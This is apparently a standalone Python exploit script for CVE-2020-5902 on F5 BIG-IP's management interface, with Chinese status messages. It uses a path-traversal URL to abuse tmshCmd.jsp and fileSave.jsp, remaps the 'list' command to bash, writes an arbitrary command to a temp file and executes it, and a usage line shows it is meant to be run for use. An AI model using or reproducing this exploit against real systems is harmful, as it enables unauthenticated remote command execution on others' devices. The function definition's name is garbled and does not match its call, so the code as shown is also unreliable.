https://downloads.f5.com/trial/
import requests
import sys
import json
requests.packages.urllib3.disable_warnings()
banner= '''
______ _______ ____ ___ ____ ___ ____ ___ ___ ____
/ ___\ \ / / ____| |___ \ / _ \___ \ / _ \ | ___|/ _ \ / _ \___ \
| | \ \ / /| _| _____ __) | | | |__) | | | |____|___ \ (_) | | | |__) |
| |___ \ V / | |__|_____/ __/| |_| / __/| |_| |_____|__) \__, | |_| / __/
\____| \_/ |_____| |_____|\___/_____|\___/ |____/ /_/ \___/_____|
'''
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
}
def che了k(url, cmd):
try:
print('[+ 开始测试目标: {} 命令: {}'.format(url,cmd))
del_alias = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'
creat_alias = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'
write_bash = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/checksafe&content={}'.format(cmd)
exec_bash = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/checksafe'
print('[+ 正在还原alias设置,防止其他人未修改回来了')
x = requests.get(del_alias,headers=headers,verify=False,timeout=30)
print('[+ 正在将list命令劫持为bash')
y = requests.get(creat_alias,headers=headers,verify=False,timeout=30)
print('[+ 正在写入bash文件')
z = requests.get(write_bash,headers=headers,verify=False,timeout=30)
print('[+ 正在执行命令,请查看output字段值'+'\n')
g = requests.get(exec_bash,headers=headers,verify=False,timeout=30)
requests.get(del_alias,headers=headers,verify=False,timeout=30)
text = g.content.decode('utf-8')
print(text.strip('\n'))
except:
print('[- 请查看目标是否可以正常访问')
if __name__ == "__main__":
try:
url = sys.argv[1]
cmd = sys.argv[2]
if url[-1] == '/':url=url[0:-1]
print(banner)
check(url=url,cmd=cmd)
except Exception as e:
# print(e)
print('python3 CVE-2020-5902.py http://x.x.x.x shell')